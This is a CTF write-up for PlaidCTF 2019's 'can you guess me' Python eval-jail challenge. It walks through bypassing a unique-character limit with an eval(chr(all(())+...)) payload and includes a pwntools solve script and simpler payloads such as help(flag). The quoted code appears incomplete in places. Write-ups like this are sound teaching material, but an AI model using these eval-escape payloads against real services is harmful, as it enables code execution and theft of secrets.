PlaidCTF 2019 - can you guess me - misc (100pt)

can you guess me
Misc - 100pt
nc ip here

This was a fun challenge from PlaidCTF. We get the source code of the server below.

#! /usr/bin/env python3

from sys import exit
from secret import secret_value_for_password, flag, exec

print(r"  ____         __   __           ____                     __  __       ")
print(r" / ___|__ _ _ _\ \ / /__  _   _ / ___|_   _  ___  ___ ___|  \/  | ___  ")
print(r"| |   / _` | '_ \ V / _ \| | | | |  _| | | |/ _ \/ __/ __| |\/| |/ _ \ ")
print(r"| |__| (_| | | | | | (_) | |_| | |_| | |_| |  __/\__ \__ \ |  | |  __/ ")
print(r" \____\__,_|_| |_|_|\___/ \__,_|\____|\__,_|\___||___/___/_|  |_|\___| ")
print(r"                                                                       ")

    val = 0
    inp = input("Input value: ")
    count_digits = len(set(inp))
    if count_digits <= 10:          # Make sure it is a number
        val = eval(inp)

    if val == secret_value_for_password:
        print("Nope. Better luck next time.")
    print("Nope. No hacking.")

The goal in this challenge is to get the value of the flag variable. The obvious vulnerability here is that the code executes eval(inp). However, you have a length limit of 10... or do you? The code gets the value of count_digits as len(set(inp)), which actually counts the number of unique characters in your input.

So, we need to find a payload with 10 or less characters that prints the flag variable.

Unfortunately... print(flag) was 1 character too many, so I just wanted to find something that worked. I tried print(dir()), and this successfully caused the program to print out all variable names in global scope.

I couldn't find an easy way to print the value of the flag variable, so I decided to try and find a way to get arbitrary code execution with exec() or eval().

I eventually stumbled upon exec(chr(1+1+....+1)+chr(1+1+....+1)+....) , which would allow me to exec() an arbitrary string with exactly 9 unique characters ( exchr1+() ). BUT.... the creators apparently thought of this. At the top of the file they have from secret import exec, and the custom exec function just prints an ASCII trollface.

eval() instead, I guess! The problem with eval(chr(1+1+...+1)+chr(1+1+...+1)+...)) payload is that it has 11 unique characters, so we need to figure out how to get rid of one. I figured that we probably need to keep eval() and chr(), so is there any way avoid using 1 ?

I looked at the list of built in functions in Python3, and noticed the very second one, all(). all(x) returns True if all the elements inside the iterable x are True. Also, in python, True is treated as 1, just like in C-based languages. So, to get a 1, we can call all() on an empty tuple: all(()).

Our final payload is in the form: eval(chr(all(())+all(())+...+all(()))+chr(all(())+all(())+...+all(()))+...)

Solve script (generates code to eval("print(flag)")):

from pwn import *
r = remote('', 12349)
exp  = "print(flag)"
chars = []
for c in exp:
    ordinal = "+".join(["all(())"] * ord(c))
    char =  "chr("+ordinal+")"

payload = "+".join(chars)
payload = "eval("+payload+")"
print payload
print len(set(payload))
r.recvuntil(': ')

Final thoughts

After the CTF ended I read about two much simpler payloads, which I may have came up with if I looked at the list of built-in functions to start off.

help(flag) and print(vars()).

I still solved it pretty quickly though, and liked my solution because it gives you arbitrary code execution.